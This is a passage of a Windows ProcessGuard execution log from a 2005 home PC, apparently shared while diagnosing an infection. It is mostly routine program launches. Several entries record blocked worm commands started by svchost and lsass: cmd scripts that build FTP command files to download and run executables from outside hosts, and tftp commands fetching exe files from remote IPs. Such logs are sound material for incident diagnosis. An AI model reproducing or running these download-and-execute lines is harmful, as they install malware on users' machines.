"c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]Fri 12 - 21:06:56 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1012] [EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]Fri 12 - 21:06:57 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1012] [EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]Fri 12 - 21:06:57 [E
0 UTION] Commandline - [ cmd /c echo open redirect.toruncity.biz 5192 >socket64.dll &echo user http http >>socket64.dll &echo binary >>socket64.dll &echo get >>socket64.dll &echo o.exe >>socket64.dll &echo o.exe >>socket64.dll &echo bye >>socket64.dll &ftp.exe -n -s:socket64.dll &del socket64.dll &o.exe ]Fri 19 - 15:24:21 [EXECUTION] "c:\windows\explorer.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]Fri 19 - 15:25:34 [EXECUTION] "c:\windows\explorer.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]Fri 19 - 15:26:06 [EXECUTION] "d:\unzipped\ymsgrau.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "d:\unzipped\ymsgrau.exe" ]Fri 19 - 15:26:11 [EXECUTION] "c:\documents and settings\dug and tania\locals~1\temp\glb3.tmp" was allowed to run [EXECUTION] Started by "d:\unzipped\ymsgrau.exe" [1660] [EXECUTION] Commandline - [ c:\docume~1\dugand~1\locals~1\temp\glb3.tmp 4736 d:\unzipped\ymsgrau.exe ]Fri 19 - 15:28:04 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf9bef274a859c945977989e1a692e9be ]Fri 19 - 15:28:04 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsba2b5c765be29f47bfa13fb717c5f8cd ]Fri 19 - 15:29:52 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 1776 -h 1604 "global\01e56b93f848019c1bc" ]Fri 19 - 15:30:08 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running [EXECUTION] Started by "Unknown Process" [540] [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wera.tmp.dir00\manifest.txt ]Fri 19 - 15:30:22 [EXECUTION] "d:\unzipped\ymsgrau.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "d:\unzipped\ymsgrau.exe" ]Fri 19 - 15:30:25 [EXECUTION] "c:\documents and settings\dug and tania\locals~1\temp\glbb.tmp" was allowed to run [EXECUTION] Started by "d:\unzipped\ymsgrau.exe" [1688] [EXECUTION] Commandline - [ c:\docume~1\dugand~1\locals~1\temp\glbb.tmp 4736 d:\unzipped\ymsgrau.exe ]Fri 19 - 15:33:00 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 980 -h 1464 "global\02135863f848019c1ac" ]Fri 19 - 15:33:05 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running [EXECUTION] Started by "Unknown Process" [1168] [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer12.tmp.dir00\manifest.txt ]Fri 19 - 15:33:30 [EXECUTION] "c:\windows\explorer.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]Fri 19 - 15:33:49 [EXECUTION] "d:\program files\messenger\ypager.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "d:\program files\messenger\ypager.exe" ]Fri 19 - 15:34:00 [EXECUTION] "c:\windows\regedit.exe" was allowed to run [EXECUTION] Started by "d:\program files\messenger\ypager.exe" [1592] [EXECUTION] Commandline - [ c:\windows\regedit.exe /s "d:\program files\messenger\viewinfo.reg" ]Fri 19 - 15:34:04 [EXECUTION] "c:\windows\regedit.exe" was allowed to run [EXECUTION] Started by "d:\program files\messenger\ypager.exe" [1592] [EXECUTION] Commandline - [ c:\windows\regedit.exe /s "d:\program files\messenger\intl.reg" ]Fri 19 - 15:34:07 [EXECUTION] "c:\windows\regedit.exe" was allowed to run [EXECUTION] Started by "d:\program files\messenger\ypager.exe" [1592] [EXECUTION] Commandline - [ c:\windows\regedit.exe /s "d:\program files\messenger\viewinfo.reg" ]Fri 19 - 15:34:10 [EXECUTION] "c:\windows\regedit.exe" was allowed to run
0 [EXECUTION] Started by "c:\program files\real\realone player\realplay.exe" [3216] [EXECUTION] Commandline - [ code::shortcutc:\documents and settings\dug and tania\application data\real\realone player\history\\-script-document.write(pagetitle);--script-.lnkc:\program files\real\realone player\realplay.exe file://c:\program%20files\real\realone%20player\datacache\getmedia\home.htmlrealone player web pa ]Fri 19 - 15:51:34 [EXECUTION] "c:\windows\system32\taskmgr.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436] [EXECUTION] Commandline - [ taskmgr.exe ]Fri 19 - 15:51:43 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 872 -h 928 "global\03256d73f848019c55c" ]Fri 19 - 15:51:54 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running [EXECUTION] Started by "Unknown Process" [3652] [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer1b.tmp.dir00\manifest.txt ]Fri 19 - 15:51:56 [EXECUTION] "c:\program files\common files\real\update_ob\realevent.exe" was blocked from running [EXECUTION] Started by "c:\program files\common files\real\update_ob\realsched.exe" [3292] [EXECUTION] Commandline - [ "c:\program files\common files\real\update_ob\realevent.exe" "c:\program files\common files\real\update_ob\faus3270.dll" rnathappshutdown_1 1 ]Fri 19 - 15:51:59 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 2556 -h 2560 "global\03296413f848019c1bc" ]Fri 19 - 15:52:08 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running [EXECUTION] Started by "Unknown Process" [3704] [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer1c.tmp.dir00\manifest.txt ]Fri 19 - 15:52:08 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436] [EXECUTION] Commandline - [ logonui.exe /status /shutdown ]---Process Guard Log Started---Fri 19 - 15:53:43 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [480] [EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]Fri 19 - 15:53:43 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1296] [EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]Fri 19 - 15:53:44 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [480] [EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]Fri 19 - 15:53:48 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1012] [EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]Fri 19 - 15:53:48 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1012] [EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]Fri 19 - 15:53:48 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1012] [EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]Fri 19 - 15:53:48 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1012] [EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]Fri 19 - 15:53:48 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1012] [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]Fri 19 - 15:53:48 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1012] [EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]Fri 19 - 15:53:48 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run [EXECUTION] Started by "Unknown Process" [1956]
0 \windows\explorer.exe" [1004] [EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]Wed 24 - 19:24:12 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsc339fcd23292f24dbf7535b49f0ce283 ]Wed 24 - 19:24:12 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsc43579fa1323614bb48e90dacb7a785f ]Wed 24 - 19:24:12 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf8b92ef092572b4780c239a26cf94acc ]Wed 24 - 19:24:12 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds3a10222c43348147a5a866c21bb684a5 ]Wed 24 - 19:24:16 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1004] [EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]Wed 24 - 19:27:14 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ tftp.exe -i 202.124.162.214 get msconfig32.exe ]Wed 24 - 19:37:00 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 416 -h 608 "global\0cf2543ec46819c1ac" ]Wed 24 - 19:37:10 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running [EXECUTION] Started by "Unknown Process" [1716] [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer3.tmp.dir00\manifest.txt ]Wed 24 - 19:37:10 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436] [EXECUTION] Commandline - [ logonui.exe /status /shutdown ]Wed 24 - 19:37:20 [TERMINATE] c:\windows\system32\services.exe [480] was blocked from terminating c:\windows\system32\spoolsv.exe [1040]---Process Guard Log Started---Wed 24 - 19:38:39 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [480] [EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]Wed 24 - 19:38:39 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1432] [EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]Wed 24 - 19:38:40 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [480] [EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]Wed 24 - 19:38:41 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1196] [EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]Wed 24 - 19:38:42 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1196] [EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]Wed 24 - 19:38:42 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1196] [EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]Wed 24 - 19:38:42 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1196] [EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]Wed 24 - 19:38:43 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1196] [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]Wed

C:\Program Files\ProcessGuard\logs\pglog_09_2005.txt (1235 KB, 30/09/2005 21:24:38)
0 - 10:01:01 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [492] [EXECUTION] Commandline - [ cmd ]Sun 04 - 10:03:51 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]Sun 04 - 10:03:51 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [480] [EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]Sun 04 - 10:07:08 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ tftp.exe -i 202.124.151.134 get tellcoma.exe ]Sun 04 - 10:09:54 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [492] [EXECUTION] Commandline - [ cmd ]Sun 04 - 10:10:28 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [492] [EXECUTION] Commandline - [ cmd /c echo open 205.177.75.16 58739 >cdtime.asp &cmd /c echo user wh0re got[bleep]ed >>cdtime.asp &cmd /c echo binary >>cdtime.asp &cmd /c echo get kimo.exe >>cdtime.asp &cmd /c echo bye >>cdtime.asp &cmd /c ftp.exe -n -s:cdtime.asp &cmd /c del cdtime.asp &start kimo.exe ]Sun 04 - 10:24:35 [EXECUTION] "c:\windows\system32\rasautou.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ rasautou -r -f "c:\windows\system32\ras\rasphone.pbk" -e "netaccess" ]Sun 04 - 10:25:02 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 1908 -h 1912 "global\01bd3e63ec3fc19c5a4" ]Sun 04 - 10:25:07 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running [EXECUTION] Started by "Unknown Process" [456] [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer4.tmp.dir00\manifest.txt ]Sun 04 - 10:25:11 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436] [EXECUTION] Commandline - [ logonui.exe /status /shutdown ]Sun 04 - 10:25:21 [TERMINATE] c:\windows\system32\services.exe [480] was blocked from terminating c:\windows\system32\spoolsv.exe [1072]---Process Guard Log Started---Sun 04 - 10:26:43 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [476] [EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]Sun 04 - 10:26:43 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1348] [EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]Sun 04 - 10:26:44 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [476] [EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]Sun 04 - 10:26:44 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1008] [EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]Sun 04 - 10:26:44 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1008] [EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]Sun 04 - 10:26:44 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1008] [EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]Sun 04 - 10:26:44 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1008] [EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]Sun 04 - 10:26:45 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1008] [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]Sun
0 o run [EXECUTION] Started by "c:\windows\explorer.exe" [1004] [EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]Sun 04 - 12:40:31 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [476] [EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]Sun 04 - 12:41:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds1ffe2d7dbd8c014d8699d03c60f10261 ]Sun 04 - 12:41:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds24b69ccfcfb8cc43ad1b08d46abb4e30 ]Sun 04 - 12:41:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds62eb77e74dc22a4aa04342fbca375a05 ]Sun 04 - 12:41:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds0a9cca70915ddd46a29346bca648797a ]Sun 04 - 12:43:02 [EXECUTION] "g:\autorun.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1004] [EXECUTION] Commandline - [ g:\autorun.exe "index.html$0$0" /hide ]Sun 04 - 12:43:02 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 1004 -h 1148 "global\02b3293ec3fc1981a8" ]Sun 04 - 12:43:07 [EXECUTION] "c:\windows\system32\dwwin.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\dumprep.exe" [1736] [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer4.tmp.dir00\manifest.txt ]Sun 04 - 12:43:09 [EXECUTION] "c:\windows\explorer.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432] [EXECUTION] Commandline - [ c:\windows\explorer.exe ]Sun 04 - 12:43:12 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]Sun 04 - 12:43:43 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [476] [EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]Sun 04 - 12:44:01 [EXECUTION] "c:\windows\explorer.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [956] [EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]Sun 04 - 12:44:49 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]Sun 04 - 12:45:30 [EXECUTION] "c:\windows\system32\dwwin.exe" was allowed to run [EXECUTION] Started by "g:\autorun.exe" [928] [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -x -s 172 ]Sun 04 - 12:45:40 [EXECUTION] "c:\windows\system32\drwtsn32.exe" was allowed to run [EXECUTION] Started by "g:\autorun.exe" [928] [EXECUTION] Commandline - [ drwtsn32 -p 928 -e 136 -g ]Sun 04 - 12:47:01 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [956] [EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]Sun 04 - 12:52:33 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [488] [EXECUTION] Commandline - [ cmd ]Sun 04 - 12:58:59 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [488] [EXECUTION] Commandline - [ cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dl
0 ON] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]Mon 05 - 17:36:35 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [540] [EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]Mon 05 - 17:37:34 [EXECUTION] "c:\windows\system32\dwwin.exe" was allowed to run [EXECUTION] Started by "c:\program files\xilisoft\dvd ripper se\vconvert.exe" [2676] [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -x -s 336 ]Mon 05 - 17:38:06 [EXECUTION] "c:\windows\system32\drwtsn32.exe" was blocked from running [EXECUTION] Started by "Unknown Process" [2676] [EXECUTION] Commandline - [ drwtsn32 -p 2676 -e 332 -g ]Mon 05 - 17:38:10 [EXECUTION] "c:\documents and settings\dug and tania\desktop\x-dvd-ripper-se.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1288] [EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\desktop\x-dvd-ripper-se.exe" ]Mon 05 - 17:38:21 [EXECUTION] "c:\program files\xilisoft\dvd ripper se\inaspi.exe" was allowed to run [EXECUTION] Started by "c:\documents and settings\dug and tania\desktop\x-dvd-ripper-se.exe" [3132] [EXECUTION] Commandline - [ "..\inaspi.exe" ]Mon 05 - 17:38:21 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "Unknown Process" [3160] [EXECUTION] Commandline - [ cmd /c install.bat xp32 ]Mon 05 - 17:38:27 [EXECUTION] "c:\program files\xilisoft\dvd ripper se\vconvert.exe" was allowed to run [EXECUTION] Started by "c:\documents and settings\dug and tania\desktop\x-dvd-ripper-se.exe" [3132] [EXECUTION] Commandline - [ "c:\program files\xilisoft\dv